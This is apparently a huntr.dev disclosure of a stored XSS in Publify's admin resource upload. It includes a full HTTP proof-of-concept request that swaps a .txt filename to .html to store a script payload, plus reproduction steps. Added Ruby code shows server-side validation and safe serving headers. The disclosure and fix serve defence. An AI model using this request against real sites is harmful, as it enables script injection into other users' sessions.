
Bypass Restriction and File Upload Leads to XSS Stored - TXT to HTML

2022-05-19 23:52:38
ninj4c0d3r
www.huntr.dev
unrestricted file upload
xss stored
bypass restriction
html file
manipulate request

EPSS

0.001

Percentile

21.4%

Description

An unrestricted file upload allowed the attacker to manipulate the upload request and bypass the block on HTML files by starting from a text file; stored XSS was obtained once the HTML file was uploaded.

Proof of Concept

POST /admin/resources/upload HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=SESSION_HERE
Content-Length: 649
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR7LwpeBoKn4f7hI5
Referer: https://demo-publify.herokuapp.com/admin/resources
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="utf8"

✓
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="authenticity_token"

TOKEN_HERE
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="upload"; filename="w00t.txt" -- Change to w00t.html
Content-Type: text/plain

<script>alert('OOPSS');</script>
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="commit"

Upload
------WebKitFormBoundaryR7LwpeBoKn4f7hI5--

  • Step 1 - Upload a .txt file and intercept the request

  • Step 2 - Change the extension of the filename to .html

  • Step 3 - Submit the request; the file is uploaded successfully
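The description and the three steps above show where the control fails: the upload handler trusts the client-supplied filename, so an extension check that only happens in the browser (or only on the declared Content-Type) can be bypassed by editing the multipart request. The following Ruby is an added example, not code from the report or from Publify itself, of the server-side checks that close this gap: an extension allowlist applied to the sanitized filename, a content sniff for HTML markers as defense in depth, and download headers that stop the browser from rendering a stored file as a document in the application's origin. The allowlist, the marker list and the function names (`validate_upload`, `download_headers`) are assumptions chosen for the example.

```ruby
# Added example (not Publify's own code): server-side upload validation that
# does not rely on the client-declared filename extension or Content-Type.
require 'set'

# Assumed allowlist for a blog's resource uploads; HTML/SVG/JS are deliberately absent.
ALLOWED_EXTENSIONS = Set.new(%w[txt png jpg jpeg gif pdf]).freeze

# Byte patterns that mark a body as active HTML content regardless of what the
# client called it. This is defense in depth, not the primary control.
HTML_MARKERS = [
  /<script\b/i, /<html\b/i, /<!doctype\s+html/i,
  /<svg\b/i, /<iframe\b/i, /<object\b/i, /<embed\b/i
].freeze

UploadDecision = Struct.new(:accepted, :reason, :safe_name)

# Reduce a client filename to a safe basename plus a lowercase extension.
# File.basename strips any directory components the client may have sent.
def sanitize_filename(name)
  base = File.basename(name.to_s).gsub(/[^A-Za-z0-9._-]/, '_')
  ext = File.extname(base).delete_prefix('.').downcase
  [base, ext]
end

# True when the leading bytes look like HTML. The slice is forced to binary so
# image uploads with non-UTF-8 bytes do not raise during matching.
def looks_like_html?(bytes)
  head = bytes.to_s.byteslice(0, 4096).to_s.b
  HTML_MARKERS.any? { |re| head.match?(re) }
end

# Decide whether an upload may be stored. The client Content-Type is ignored on
# purpose: in the report it stays text/plain while the extension becomes .html.
def validate_upload(filename, bytes)
  base, ext = sanitize_filename(filename)
  unless ALLOWED_EXTENSIONS.include?(ext)
    return UploadDecision.new(false, "extension '#{ext}' not allowed", nil)
  end
  return UploadDecision.new(false, 'content looks like HTML', nil) if looks_like_html?(bytes)
  UploadDecision.new(true, 'ok', base)
end

# Headers for serving a stored resource: force download, forbid MIME sniffing
# and sandbox the response so a mis-stored file still cannot run script.
def download_headers(safe_name)
  {
    'Content-Type' => 'application/octet-stream',
    'Content-Disposition' => "attachment; filename=\"#{safe_name}\"",
    'X-Content-Type-Options' => 'nosniff',
    'Content-Security-Policy' => "default-src 'none'; sandbox"
  }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample body mirroring the report's request.
  payload = "<script>alert('OOPSS');</script>"
  puts validate_upload('w00t.html', payload).reason   # rejected on extension
  puts validate_upload('w00t.txt', payload).reason    # rejected on content
  puts validate_upload('notes.txt', 'plain notes').reason
  puts download_headers('notes.txt').inspect
end
```

Run it with `ruby upload_check.rb`. The swapped filename from step 2 is rejected by the allowlist, and the same script body under its original `.txt` name is rejected by the content sniff, so neither path stores a file the browser would render as HTML; the headers make the stored copy safe even if a later check is relaxed.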

Video

https://drive.google.com/file/d/1bNffqwUl_9Sn7wqpBvEAqvV_PGRadlPb/view?usp=sharing
